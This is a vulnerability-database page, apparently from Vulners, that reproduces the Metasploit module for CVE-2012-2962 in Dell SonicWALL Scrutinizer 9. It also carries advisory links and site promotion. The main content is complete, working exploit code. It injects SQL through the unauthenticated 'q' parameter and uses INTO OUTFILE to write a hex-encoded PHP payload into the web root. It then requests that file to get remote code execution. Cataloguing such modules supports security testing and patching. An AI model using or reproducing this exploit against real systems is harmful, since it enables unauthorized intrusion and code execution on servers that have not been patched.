Lucene search
K

Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection

🗓️ 01 Aug 2012 20:00:24Reported by muts, Devon Kearns, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 16 Views

Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection vulnerability allows remote code execution without authentication

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Dell SonicWALL Scrutinizer 9 SQL Injection Vulnerability
3 Aug 201200:00
zdt
Circl
CVE-2012-2962
22 Jul 201200:00
circl
Check Point Advisories
Dell SonicWALL Scrutinizer SQL Injection (CVE-2012-2962)
13 Jan 201300:00
checkpoint_advisories
CVE
CVE-2012-2962
30 Jul 201222:00
cve
Cvelist
CVE-2012-2962
30 Jul 201222:00
cvelist
Dsquare
SonicWALL Scrutinizer 9.0.1 SQL Injection
9 Nov 201200:00
dsquare
Exploit DB
Dell SonicWALL Scrutinizer 9 - SQL Injection (Metasploit)
3 Aug 201200:00
exploitdb
NVD
CVE-2012-2962
30 Jul 201222:55
nvd
OpenVAS
Plixer / Dell SonicWALL Scrutinizer < 9.5.2 'q' Parameter SQLi Vulnerability - Active Check
21 Aug 201200:00
openvas
Packet Storm
Dell SonicWALL Scrutinizer 9.0.1 SQL Injection
22 Jul 201200:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection",
      'Description'    => %q{
          This module exploits a vulnerability found in Dell SonicWall Scrutinizer.
        While handling the 'q' parameter, the PHP application does not properly filter
        the user-supplied data, which can be manipulated to inject SQL commands, and
        then gain remote code execution.  Please note that authentication is NOT needed
        to exploit this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'muts',
          'Devon Kearns',
          'sinn3r'
        ],
      'References'     =>
        [
          ['CVE', '2012-2962'],
          ['OSVDB', '84232'],
          ['EDB', '20033'],
          ['BID', '54625'],
          ['URL', 'http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          # According to advisory, version 9.5.1 and before are vulnerable.
          # But was only able to test this on 9.0.1.0
          ['Dell SonicWall Scrutinizer 9.5.1 or older', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-07-22',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The path to the SonicWall Scrutinizer\'s statusFilter file', '/d4d/statusFilter.php']),
          OptString.new('HTMLDIR',   [true, 'The HTML root directory for the web application', 'C:\\Program Files\\Scrutinizer\\html\\'])
        ])
  end


  def check
    res = send_request_raw({'uri'=>'/'}) # Check the base path for version regex
    if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
      res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end


  def exploit
    peer = "#{rhost}:#{rport}"
    p = "<?php #{payload.encoded} ?>"
    hex_payload = p.unpack("H*")[0]
    php_fname   = Rex::Text.rand_text_alpha(5) + ".php"
    rnd_txt     = Rex::Text.rand_text_alpha_upper(3)

    print_status("Sending SQL injection...")
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path),
      'method'    => 'POST',
      'vars_post' => {
        'commonJson' => 'protList',
        'q' => "#{rnd_txt}' union select 0x#{hex_payload},0 into outfile '../../html/d4d/#{php_fname}'#"
      }
    })

    if res and res.body !~ /No Results Found/
      print_error("I don't think the SQL Injection attempt worked")
      return
    elsif not res
      print_error("No response from the server")
      return
    end

    # For debugging purposes, this is useful
    vprint_status(res.to_s)

    target_path = "#{File.dirname(target_uri.path)}/#{php_fname}"
    print_status("Requesting: #{target_path}")
    send_request_raw({'uri' => normalize_uri(target_path)})

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
8.4High risk
Vulners AI Score8.4
CVSS 26.5
EPSS0.90336
16